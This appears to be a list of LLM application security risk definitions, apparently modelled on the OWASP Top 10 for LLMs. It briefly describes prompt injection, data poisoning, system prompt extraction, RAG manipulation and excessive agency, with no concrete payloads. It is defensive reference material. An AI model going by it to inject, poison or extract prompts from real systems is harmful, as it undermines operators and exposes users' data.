Tricking the LLM through malicious input to ignore its original instructions or perform unauthorized actions. This can lead to unexpected and harmful behavior.

The LLM inadvertently reveals confidential data (PII, secrets, internal context) from its training data, context window, or external data retrieval systems.

Compromise through vulnerabilities in pre-trained models, third-party plugins, or data sources used to build, train, or integrate the LLM application.

Malicious actors inject corrupted or biased data during the training/fine-tuning process, leading the model to learn harmful, incorrect, or prejudiced behaviors.

The LLM generates potentially harmful or executable content (e.g., HTML, SQL, code snippets) that is not sanitized before being rendered or executed by the host system.

The LLM is given overly permissive functions or access rights, allowing it to perform critical, unintended, or dangerous actions (e.g., deleting data, transferring funds).

An attacker successfully extracts the secret, proprietary system prompt or configuration details, revealing the LLM’s operational logic and potentially sensitive context.

Vulnerabilities in Vector Databases or Retrieval-Augmented Generation (RAG) systems, such as injecting vectors that lead to incorrect or malicious data retrieval.

The LLM generates false, inaccurate, or misleading information (hallucinations), which is then consumed and trusted by the end-user or downstream systems.

Lack of effective resource limits leads to denial-of-service (DoS) or excessive billing by allowing attackers to trigger high-cost, continuous, or repeated computational tasks.